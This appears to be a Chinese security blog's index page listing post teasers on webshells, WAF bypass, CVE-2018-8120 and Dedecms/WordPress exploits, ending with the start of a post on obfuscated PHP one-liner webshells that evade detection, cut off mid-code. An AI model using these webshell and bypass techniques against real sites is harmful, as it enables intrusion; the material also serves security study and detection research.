[置顶]超强ASP木马-RedHAt Webshell

[置顶]【国内首发】PHP木马-php_mof SHELL

.net下ashx菜刀可用的一句话服务端两个

<%@ WebHandler Language="JScript" class="AsyncHandlerSpy"%>import System;import System.Web;import System.IO;public class AsyncHandlerSpy implements IHttpAsyncHandler{function

WAF绕过的一些总结和思考

(测试环境 windows 2003 Enterprise 中文语言包 + APAC++HE + WAF)WAF分类:1.网络层类2.最常见且容易部署的应用层类 (部署在APAC++HE之前,APAC++HE之后)应用层WAF – 利用WAF自身缺陷和MYSQL语法特性并结合实际绕过:WAF最常见检测方式:关键词检测 例如 如果出现 [空格]union[空格] 这样的SQL语句则视为恶意请求,丢弃这个数据包,XSS代码同理。常见的绕过类型:类型1:数据包 -> WAF(利用string存储

不包含数字字母的WebShell

2.png

Wordpress 4.9.6及以下版本 任意文件删除漏洞

Wordpress <= 4.9.6 任意文件删除漏洞WordPress是如今使用最为广泛的一套内容管理系统。根据 w3tech 统计,全世界大概有30%的网站运行着WordPress程序。昨日RIPS团队公开了一个Wordpress的任意文件删除漏洞(需要登录),目前该漏洞仍然未修复(2018年06月27日),该漏洞影响 Wordpress 最新版 4.9.6.本文我们将结合 VulnSpy 的在线 WordPress 环境来演示该漏洞的利用。VulnSpy Wordpress 4.9

利用Zgrab绕CDN找真实IP

1. 安装Zmap1yum install zmap git wget如果提示找不到zmap请自行添加最新的源CentOS6:1yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-6.noarch.rpmCentOS7:1yum install https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm 2. 安装Go

Deformity PHP Webshell、Webshell Hidden Learning

目录0. 引言1. webshell原理介绍2. webshell的常见类型以及变种方法3. webshell的检测原理以及检测工具4. webshell隐藏反检测对抗手段 0. 引言本文旨在研究Webshell的各种猥琐编写方式以及webshell后门的生成、检测技术,主要分享了一些webshell的编写方法以及当前对webshell的识别、检测技术的原理以及相应工具的使用,希望能给研究这一领域的朋友带来一点点帮助,同时抛砖引玉,和大

PHP中使用按位取反(~)函数创建后门

关于CVE-2018-8120的最新Windows提权漏洞分析

一、背景介绍5月中旬ESET披露了其捕获的PDF文档样本中的两枚0-day漏洞,其中包含针对Windows系统的内核提权漏洞。该漏洞的漏洞编号为CVE-2018-8120,Windows已经提供安全更新修复此安全漏洞。天融信阿尔法实验室将以Windows Server 2003 32位系统为目标,详细介绍该漏洞成因、如何触发漏洞、以及如何使用该漏洞制作“本地应用程序权限提升”工具。经验证,诸多版本的Windows系统均存在该漏洞,文末同时附带一份利用该漏洞制作的提权工具,以供学习。经测试该工具支

Dedecms V5.7 后台文件重命名[CVE-2018-9134]

Dedecms V5.7 后台文件重命名[CVE-2018-9134]Dedecms V5.7版本后台可实现对于文件的重命名,可将上传的任意文件重名为php文件,导致getshell。该漏洞的逻辑比较简单,就从漏洞的入口文件开始看,漏洞的入口文件是dede/file_manage_control.php,其部分源码如下:重点就在于这里的if,由于dede采取的是伪全局变量注册机制,导致在未经过滤的情况下我们可声明任意变量。在该文件中,前面只是简单的验证身份是否正确,并没有对于变量进行任何过滤。也

分享几个好玩的过狗一句话

之前玩CTF遇到一个一句话很有意思,于是就把之前收藏的文章拿出来看看,学习一下,同时分享给各位。所有的吗都是在前人的基础上稍作修改,对于一些关键点会稍作解释,方便大家理解。

第一种

隐藏关键字,通过对单个字符变量进行++操作来获取其他字符,再进行拼接得到我们想要的函数。


1
2
3
4
5
6
7
8
@$_=[].'';        //PHP5.3之后(不包括5.3)才能这么用,数组被强制转换成字符串,获取字符串Array,等下要用到A
@$___=$_[''];     //获取A字符,这里的空字符串会被转换成0,即['']变成[0]

$_ = 'A';
$_++;//$_的值为A

$__ = "Z";
$__++;//$__的值为AA,而不会是ASCII字符Z